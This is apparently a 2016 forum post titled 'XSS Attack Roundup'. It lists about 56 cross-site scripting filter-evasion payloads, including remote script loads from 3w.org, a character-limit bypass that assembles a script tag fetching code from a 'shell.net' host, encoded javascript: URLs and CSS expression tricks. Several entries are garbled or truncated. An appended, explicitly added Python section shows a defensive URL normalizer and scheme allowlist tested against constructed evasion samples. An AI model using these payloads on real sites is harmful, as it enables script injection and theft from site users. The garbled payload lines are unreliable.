XSS Attack Roundup

Posted 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up boxes
<q/oncut=alert()>
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (the semicolons are required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab to split up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab to split up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Getting around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect domestically, because there is nowhere to use them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute using a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>

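Items (3) through (19) are all spellings of the same javascript: URL: case changes, decimal and hex character references with and without semicolons, embedded tabs, newlines, carriage returns, null bytes and leading spaces. The following example is added here and is not part of the original post; it shows the defender's side of that list, a URL-attribute check that normalizes a value the way a browser does before applying a scheme allowlist. The sample values are constructed from those technique names, not taken from the post.

```python
import html
import re
from typing import Optional

# Control characters and whitespace that browsers skip while working out the
# scheme of a URL attribute (tab, newline, carriage return, NUL, leading spaces).
_IGNORED = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):")
ALLOWED_SCHEMES = {"http", "https"}

def normalize_url_value(value: str) -> str:
    """Approximate the browser's view of an attribute value: decode character
    references (decimal or hex, with or without the trailing semicolon), drop
    the ignored characters, and lower-case the result."""
    return _IGNORED.sub("", html.unescape(value)).lower()

def url_scheme(value: str) -> Optional[str]:
    """Return the scheme a browser would resolve, or None for a relative URL."""
    match = _SCHEME.match(normalize_url_value(value))
    return match.group(1) if match else None

def is_safe_url(value: str) -> bool:
    """Allowlist check: relative and http(s) URLs pass; javascript:, vbscript:,
    data: and any other scheme are rejected however they are encoded."""
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES

# Constructed samples modelled on items (3)-(19); the last two are benign.
SAMPLES = {
    "plain": "javascript:alert('XSS')",
    "mixed_case": "JaVaScRiPt:alert('XSS')",
    "decimal_entities": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "decimal_no_semicolon": "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099"
                            "&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",
    "hex_no_semicolon": "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
    "embedded_tab": "jav&#x09;ascript:alert('XSS')",
    "embedded_newline": "jav&#x0A;ascript:alert('XSS')",
    "embedded_cr": "jav&#x0D;ascript:alert('XSS')",
    "null_byte": "java\x00script:alert('XSS')",
    "leading_spaces": "   javascript:alert('XSS')",
    "benign_http": "http://example.com/logo.png",
    "benign_relative": "/static/logo.png",
}

def scan_samples() -> dict:
    """Map each sample name to whether the allowlist lets it through."""
    return {name: is_safe_url(value) for name, value in SAMPLES.items()}
```

Calling scan_samples() reports every constructed evasion as blocked and only the two benign URLs as allowed; a denylist that looked for the literal string "javascript:" would miss all but the first sample.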